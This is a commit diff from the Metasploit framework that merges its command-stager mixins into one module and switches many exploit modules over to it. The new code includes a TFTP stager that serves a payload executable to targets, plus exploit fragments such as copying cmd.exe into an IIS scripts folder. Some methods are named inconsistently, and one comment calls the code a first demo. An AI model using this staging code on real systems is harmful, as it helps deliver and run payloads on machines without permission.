Use One CMDStagermixin

bug/bundler_fix
jvazquez-r7 2014-02-07 18:46:19 -06:00 committed by Spencer McIntyre
parent 0a99b549d6
commit 7ced5927d8
32 changed files with 168 additions and 240 deletions

View File

@ -1,97 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStager::Multi
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new('CMDSTAGER::DECODERSTUB', [ false, 'The decoder stub to use.', nil]),
], self.class)
end
def create_stager(exe, opts)
case opts[:flavor]
when :bourne
return Rex::Exploitation::CmdStagerBourne.new(exe)
when :debug_asm
return Rex::Exploitation::CmdStagerDebugAsm.new(exe)
when :debug_write
return Rex::Exploitation::CmdStagerDebugWrite.new(exe)
when :echo
return Rex::Exploitation::CmdStagerEcho.new(exe)
when :printf
return Rex::Exploitation::CmdStagerPrintf.new(exe)
when :vbs, :vbs_adodb
return Rex::Exploitation::CmdStagerVBS.new(exe)
end
end
def execute_cmdstager(opts = {})
if not opts.include?(:flavor)
default_flavor = guess_flavor
vprint_status("Using default stager: #{default_flavor}")
opts[:flavor] = default_flavor
end
if not opts.include?(:decoder)
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
end
super
end
def generate_cmdstager(opts = {}, pl = nil)
if not opts.include?(:decoder)
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
end
super
end
def guess_decoder(opts)
case opts[:flavor]
when :debug_asm
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
when :debug_write
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
when :vbs
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
when :vbs_adodb
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
end
return nil
end
def guess_flavor
c_platform = nil
if target_platform.names.length == 1
c_platform = target_platform.names.first
end
case c_platform
when 'linux', 'Linux'
return :bourne
when 'osx', 'OSX'
return :bourne
when 'unix', 'Unix'
return :bourne
when 'win', 'Windows'
return :vbs
end
return nil
end
end
end

View File

@ -1,67 +0,0 @@
# -*- coding: binary -*-
require 'rex/text'
require 'msf/core/exploit/tftp'
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStager::TFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::TFTPServer
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'TFTPHOST', [ false, 'The address of the machine hosting the file via TFTP.' ]),
OptString.new( 'TFTPRSRC', [ false, 'The filename of the TFTP-hosted resource.' ]),
], self.class)
end
def create_stager(exe, opts)
Rex::Exploitation::CmdStagerTFTP.new(exe)
end
def execute_cmdstager(opts = {})
tftphost = datastore['TFTPHOST']
tftphost ||= datastore['SRVHOST']
tftphost ||= datastore['LHOST']
@exe_tag = datastore['TFTPRSRC']
@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
super
end
#
# Start the service and register the file
#
def execute_cmdstager_begin(opts)
start_service(@exe_tag, @exe)
end
#
# Stop the service
#
def execute_cmdstager_end(opts)
stop_service
end
def payload_exe
return nil if not @stager_instance
@stager_instance.payload_exe
end
end
end

View File

@ -19,8 +19,12 @@ module Exploit::CmdStager
# #
def initialize(info = {}) def initialize(info = {})
super super
@cmd_list = nil
@stager_instance = nil @stager_instance = nil
register_advanced_options(
[
OptString.new('CMDSTAGER::DECODERSTUB', [ false, 'The decoder stub to use.', nil]),
], self.class)
end end
@ -28,10 +32,27 @@ module Exploit::CmdStager
# Execute the command stager while showing the progress # Execute the command stager while showing the progress
# #
def execute_cmdstager(opts = {}) def execute_cmdstager(opts = {})
# Starts select the correct stager
unless opts.include?(:flavor)
default_flavor = guess_flavor
vprint_status("Using default stager: #{default_flavor}")
opts[:flavor] = default_flavor
end
unless opts.include?(:decoder)
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
end
# Ends select the correct stager
cmd_list = generate_cmdstager(opts) cmd_list = generate_cmdstager(opts)
@stager_instance.setup(self)
begin
execute_cmdstager_begin(opts) execute_cmdstager_begin(opts)
sent = 0 sent = 0
total_bytes = 0 total_bytes = 0
cmd_list.each { |cmd| total_bytes += cmd.length } cmd_list.each { |cmd| total_bytes += cmd.length }
@ -51,6 +72,9 @@ module Exploit::CmdStager
end end
execute_cmdstager_end(opts) execute_cmdstager_end(opts)
ensure
@stager_instance.teardown
end
end end
@ -59,11 +83,18 @@ module Exploit::CmdStager
# and operating system. # and operating system.
# #
def generate_cmdstager(opts = {}, pl = nil) def generate_cmdstager(opts = {}, pl = nil)
# starts Multi task
unless opts.include?(:decoder)
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
end
# ends Multi task
pl ||= payload.encoded pl ||= payload.encoded
@exe = generate_payload_exe @exe = generate_payload_exe
@stager_instance = create_stager(@exe, opts) @stager_instance = create_stager(opts)
cmd_list = @stager_instance.generate(opts) cmd_list = @stager_instance.generate(opts)
if (cmd_list.nil? or cmd_list.length < 1) if (cmd_list.nil? or cmd_list.length < 1)
@ -84,6 +115,57 @@ module Exploit::CmdStager
print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total]) print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
end end
def create_stager(opts)
case opts[:flavor]
when :bourne
return Rex::Exploitation::CmdStagerBourne.new(@exe)
when :debug_asm
return Rex::Exploitation::CmdStagerDebugAsm.new(@exe)
when :debug_write
return Rex::Exploitation::CmdStagerDebugWrite.new(@exe)
when :echo
return Rex::Exploitation::CmdStagerEcho.new(@exe)
when :printf
return Rex::Exploitation::CmdStagerPrintf.new(@exe)
when :vbs, :vbs_adodb
return Rex::Exploitation::CmdStagerVBS.new(@exe)
when :tftp
return Rex::Exploitation::CmdStagerTFTP.new(@exe)
end
end
def guess_decoder(opts)
case opts[:flavor]
when :debug_asm
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
when :debug_write
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
when :vbs
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
when :vbs_adodb
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
end
return nil
end
def guess_flavor
c_platform = nil
if target_platform.names.length == 1
c_platform = target_platform.names.first
end
case c_platform
when 'linux', 'Linux'
return :bourne
when 'osx', 'OSX'
return :bourne
when 'unix', 'Unix'
return :bourne
when 'win', 'Windows'
return :vbs
end
return nil
end
# #
# Methods to override - not used internally # Methods to override - not used internally
# #

View File

@ -172,6 +172,19 @@ class CmdStagerBase
nil nil
end end
# Should be overriden if the cmd stager needs to setup anything
# before it's executed
def setup(mod)
end
#
# Should be overriden if the cmd stager needs to do any clenaup
#
def teardown
end
end end
end end
end end

View File

@ -27,7 +27,6 @@ class CmdStagerTFTP < CmdStagerBase
def initialize(exe) def initialize(exe)
super super
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe" @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end end
@ -51,11 +50,23 @@ class CmdStagerTFTP < CmdStagerBase
super super
end end
def setup_stager(mod)
tftp = Rex::Proto::TFTP::Server.new
tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
tftp.start
mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
def teardown_stager
tftp.stop
end
# NOTE: We don't use a concatenation operator here since we only have a couple commands. # NOTE: We don't use a concatenation operator here since we only have a couple commands.
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
# the start command being issued separately so that it can ignore it :) # the start command being issued separately so that it can ignore it :)
attr_reader :exe
attr_reader :payload_exe attr_reader :payload_exe
attr_accessor :tftp
end end
end end
end end

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info={}) def initialize(info={})
@ -193,6 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@cookie = '' @cookie = ''
setup_stager setup_stager
end end
end end

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -88,10 +88,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def windows_stager def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper

View File

@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient

View File

@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient

View File

@ -9,7 +9,7 @@ require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
attr_accessor :ssh_socket attr_accessor :ssh_socket

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info={})

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
@ -50,11 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def windows_stager def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -52,11 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def windows_stager def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DefaultOptions' => 'DefaultOptions' =>
{ {
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") 'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
}, },
'DisclosureDate' => 'Jul 29 2013')) 'DisclosureDate' => 'Jul 29 2013'))

View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -53,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def windows_stager def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'}) execute_cmdstager({ :temp => '.', :flavor => :tftp})
@payload_exe = payload_exe @payload_exe = payload_exe
print_status("Attempting to execute the payload...") print_status("Attempting to execute the payload...")

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
def initialize(info = {}) def initialize(info = {})

View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: This cannot be an HttpClient module since the response from the server # NOTE: This cannot be an HttpClient module since the response from the server
# is not a valid HttpResponse # is not a valid HttpResponse
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Use the CMD stager to get a payload running # Use the CMD stager to get a payload running
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname }) execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp})
# Save these file names for later deletion # Save these file names for later deletion
@exe_cmd_copy = exe_fname @exe_cmd_copy = exe_fname

View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::CmdStager
def initialize def initialize
super( super(
@ -327,7 +327,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z) res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
# Use the CMD stager to get a payload running # Use the CMD stager to get a payload running
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname }) execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp })
# Save these file names for later deletion # Save these file names for later deletion
@exe_cmd_copy = exe_fname @exe_cmd_copy = exe_fname

View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::MSSQL include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL include Msf::Exploit::Remote::MSSQL
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
#include Msf::Exploit::CmdStagerDebugAsm #include Msf::Exploit::CmdStagerDebugAsm
#include Msf::Exploit::CmdStagerDebugWrite #include Msf::Exploit::CmdStagerDebugWrite
#include Msf::Exploit::CmdStagerTFTP #include Msf::Exploit::CmdStagerTFTP

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super( super(

View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::SMB
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::WinRM include Msf::Exploit::Remote::WinRM
include Msf::Exploit::CmdStagerMulti include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'WfsDelay' => 30, 'WfsDelay' => 30,
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate', 'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
}, },
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
@ -60,11 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class ], self.class
) )
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
], self.class)
@compat_mode = false @compat_mode = false
end end